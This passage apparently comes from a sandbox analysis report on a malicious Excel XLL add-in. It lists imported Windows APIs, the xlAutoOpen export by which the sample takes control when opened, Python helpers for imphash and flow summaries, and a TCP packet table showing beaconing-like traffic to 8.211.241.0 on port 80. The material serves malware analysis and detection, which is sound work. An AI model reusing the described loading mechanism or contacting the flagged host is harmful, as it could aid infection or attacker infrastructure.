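        "FindAtomA", "SetFileApisToANSI", "SetFileAttributesA", "LockResource",
        "lstrcmpiW", "FreeEnvironmentStringsW", "VirtualFree", "SetMailslotInfo",
        "EnumSystemLocalesA", "ScrollConsoleScreenBufferA", "GetConsoleCommandHistoryA",
        "GlobalUnlock", "GetSystemDirectoryW", "FatalExit", "_lopen",
        "DisableThreadLibraryCalls", "WaitForSingleObject", "PostQueuedCompletionStatus",
        "InvalidateConsoleDIBits", "CreateDirectoryExA", "lstrcmpA", "LocalFlags",
        "GetFileInformationByHandle", "BeginUpdateResourceA", "GetVDMCurrentDirectories",
        "SetFileAttributesW", "CreateSemaphoreW", "ReadConsoleOutputAttribute",
    ],
    "oleaut32.dll": [
        "VarR4FromDisp", "CreateStdDispatch", "VarDateFromUI8", "OleSavePictureFile",
        "VarI2FromDisp", "VarR8FromUI2", "SysStringLen", "VarDecFromUI2", "VarR4FromUI8",
        "SafeArrayCopyData", "LPSAFEARRAY_Marshal", "DispGetIDsOfNames",
        "SafeArrayGet LBound".replace(" ", ""), "VarBstrFromR8", "VarI2FromDec",
        "GetRecordInfoFromGuids", "VarBstrFromUI1", "VarUI2FromI2", "VarTokenizeFormatString",
    ],
    "tapi32.dll": [
        "lineCreateAgentSessionA", "lineSetMediaControl", "MMCGetAvailableProviders",
        "lineNegotiateAPIVersion", "lineDialA", "lineDrop",
    ],
}

STRIP_EXTENSIONS = (".dll", ".ocx", ".sys")


def normalize_imports(imports) -> list:
    """Build the 'library.function' list an imphash is computed over.

    Library names are lower-cased and lose a .dll/.ocx/.sys extension, function
    names are lower-cased, and order is preserved because the hash is order
    sensitive. Ordinal-only imports (which pefile maps to names for a few DLLs)
    are a simplification left out here.
    """
    entries = []
    for dll, funcs in imports.items():
        lib = dll.lower()
        for ext in STRIP_EXTENSIONS:
            if lib.endswith(ext):
                lib = lib[:-len(ext)]
                break
        entries.extend(f"{lib}.{func.lower()}" for func in funcs)
    return entries


def imphash(imports) -> str:
    """MD5 over the comma-joined normalized entries, as pefile's get_imphash does."""
    return hashlib.md5(",".join(normalize_imports(imports)).encode()).hexdigest()


def dll_breakdown(imports) -> dict:
    return {dll: len(funcs) for dll, funcs in imports.items()}


if __name__ == "__main__":
    print("imphash:", imphash(SAMPLE_IMPORTS))
    for dll, n in dll_breakdown(SAMPLE_IMPORTS).items():
        print(f"  {dll}: {n} imports")
```

Because the digest depends on order, two builds that import the same functions in a different sequence hash differently; that is why imphash pivots work well for generated tables and poorly for hand-edited ones.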

Exports

Name        Ordinal  Address
xlAutoOpen  1        0xcd41903

xlAutoOpen is the callback Excel invokes when it loads an XLL add-in, so this single export is how the sample gains control once the file is opened in Excel.

Network Behavior

Network Port Distribution
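
As an added example (not part of the report), the script below derives a port distribution and per-flow packet counts from rows in the format of the TCP Packets table: it parses each row, groups packets into bidirectional flows keyed by the 4-tuple, counts packets in each direction, measures flow duration, and tallies flows per server port. The sample rows are constructed from the first entries of that table; the client-to-server orientation is taken from the first packet seen for a 4-tuple, which in a complete capture is the SYN.

```python
import re
from collections import Counter
from datetime import datetime

# One row of the TCP Packets table: timestamp, source port, dest port, source IP, dest IP.
ROW = re.compile(
    r"^(?P<date>[A-Za-z]{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(?P<frac>\d+) [A-Z]+\s+"
    r"(?P<sport>\d+)\s+(?P<dport>\d+)\s+(?P<src>[\d.]+)\s+(?P<dst>[\d.]+)$"
)

# Constructed sample: the first rows of the TCP Packets table, one packet per line.
SAMPLE_ROWS = """\
Jul 8, 2021 16:30:09.692430019 CEST  49724  80     192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:09.726878881 CEST  80     49724  8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.727005959 CEST  49724  80     192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:09.727418900 CEST  49724  80     192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:09.762516975 CEST  80     49724  8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:10.367295027 CEST  49724  80     192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.174525976 CEST  49748  80     192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.211349964 CEST  80     49748  8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.211483955 CEST  49748  80     192.168.2.3  8.211.241.0
"""


def parse_row(line: str):
    """Return (timestamp, sport, dport, src, dst); nanoseconds are cut to microseconds."""
    m = ROW.match(line.strip())
    if not m:
        raise ValueError(f"unparsable row: {line!r}")
    frac = m["frac"][:6].ljust(6, "0")
    ts = datetime.strptime(f"{m['date']}.{frac}", "%b %d, %Y %H:%M:%S.%f")
    return ts, int(m["sport"]), int(m["dport"]), m["src"], m["dst"]


def summarize_flows(rows) -> dict:
    """Group packets into bidirectional flows keyed by (client, cport, server, sport).

    The first packet seen for a 4-tuple fixes the client -> server direction.
    'out' counts client packets, 'in' counts server packets.
    """
    flows = {}
    for ts, sport, dport, src, dst in rows:
        fwd = (src, sport, dst, dport)
        rev = (dst, dport, src, sport)
        if fwd in flows:
            flow = flows[fwd]
            flow["out"] += 1
        elif rev in flows:
            flow = flows[rev]
            flow["in"] += 1
        else:
            flow = flows[fwd] = {"out": 1, "in": 0, "first": ts, "last": ts}
        flow["first"] = min(flow["first"], ts)
        flow["last"] = max(flow["last"], ts)
    for flow in flows.values():
        flow["duration_s"] = (flow["last"] - flow["first"]).total_seconds()
    return flows


def port_distribution(flows) -> dict:
    """Flows per server port, the figure a port-distribution chart plots."""
    return dict(Counter(key[3] for key in flows))


def servers(flows) -> list:
    """Distinct (server IP, server port) pairs the client contacted."""
    return sorted({(key[2], key[3]) for key in flows})


if __name__ == "__main__":
    rows = [parse_row(line) for line in SAMPLE_ROWS.splitlines() if line.strip()]
    flows = summarize_flows(rows)
    for (src, sport, dst, dport), f in flows.items():
        print(f"{src}:{sport} -> {dst}:{dport}  out={f['out']} in={f['in']} "
              f"duration={f['duration_s']:.3f}s")
    print("flows per server port:", port_distribution(flows))
    print("servers:", servers(flows))
```

Two flows to the same server and port roughly 48 seconds apart, each short, is the shape of a beacon-and-download pair; the same summary over the full table, or over a pcap exported to this row format, gives the interval and volume figures to put in a detection rule.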

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jul 8, 2021 16:30:09.692430019 CEST  49724        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:09.726878881 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.727005959 CEST  49724        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:09.727418900 CEST  49724        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:09.762516975 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811278105 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811317921 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811345100 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811362982 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811381102 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811399937 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811415911 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.812691927 CEST  49724        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:10.367295027 CEST  49724        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.174525976 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.211349964 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.211483955 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.213911057 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.250462055 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378170967 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378241062 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378279924 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378309965 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378346920 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378382921 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378420115 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378422022 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.378456116 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378460884 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.378468990 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.378492117 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378510952 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.378530025 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.380610943 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.416707993 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.416785955 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.416913033 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.416939020 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417027950 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417084932 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417115927 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417136908 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417190075 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417205095 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417242050 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417292118 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417310953 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417345047 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417397022 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417412043 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417455912 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417510986 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417526960 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417582989 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417639017 CEST  80           49748      8.211.241.0  192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417658091 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.417694092 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417766094 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.418477058 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.418606997 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.418632984 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.418648005 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.418725967 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.418761015 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455653906 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455688000 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455710888 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455730915 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455754995 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455775976 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455796003 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455815077 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455837011 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455856085 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455873966 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455878973 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455892086 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455910921 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455919981 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455926895 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455929995 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455933094 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455948114 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455952883 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455969095 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455986023 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456007004 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456024885 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456027031 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456073046 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456084013 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456089020 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456115007 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456135988 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456156969 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456180096 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456223965 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456248045 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456253052 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456315041 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456352949 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456374884 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456397057 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456423044 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456446886 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456485033 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456492901 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456532001 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456541061 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456607103 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456629992 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456651926 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456671953 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456682920 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456696033 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456717968 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456732035 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456768036 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456814051 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456835985 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456856966 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456877947 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456885099 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456931114 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492331028 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492356062 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492379904 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492403984 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492424965 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492440939 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492453098 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492521048 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492532969 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492539883 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492564917 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492567062 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492569923 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492574930 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492583990 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492603064 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492624044 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492645979 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492669106 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492671967 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492683887 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492688894 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492702007 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492741108 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492753029 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492755890 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492811918 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492851973 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492870092 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492883921 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492898941 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.492922068 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.492971897 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.493009090 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.493029118 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.493042946 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.493077040 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.493243933 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.493319988 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.493391037 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.493669033 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.493712902 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.493760109 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.493771076 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.493835926 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.494410992 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.526087046 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.528789043 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.531358004 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.561372995 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561402082 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561419010 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561434984 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561453104 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561470985 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561495066 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561511040 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561572075 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561605930 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.561646938 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.561675072 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561700106 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.561721087 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716644049 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716665030 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716686964 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716708899 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716728926 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716737032 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.716753960 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.716754913 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716778040 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716785908 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.716795921 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.716799974 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716816902 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716831923 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716842890 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.716855049 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716871977 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716883898 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.716891050 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716912031 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716928959 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.716929913 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.716959953 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.728084087 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.728115082 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.728302002 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.728401899 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.728563070 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.764488935 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.799475908 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799535990 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799573898 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799611092 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799663067 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.799675941 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799705029 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.799720049 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799757957 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799796104 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799823046 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.799834013 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799869061 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799894094 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.799907923 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799931049 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.799945116 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.799993038 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.800035954 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.800061941 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.800074100 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.800098896 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.800112963 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.800149918 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.800185919 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.800204039 CEST4974880192.168.2.38.211.241.0
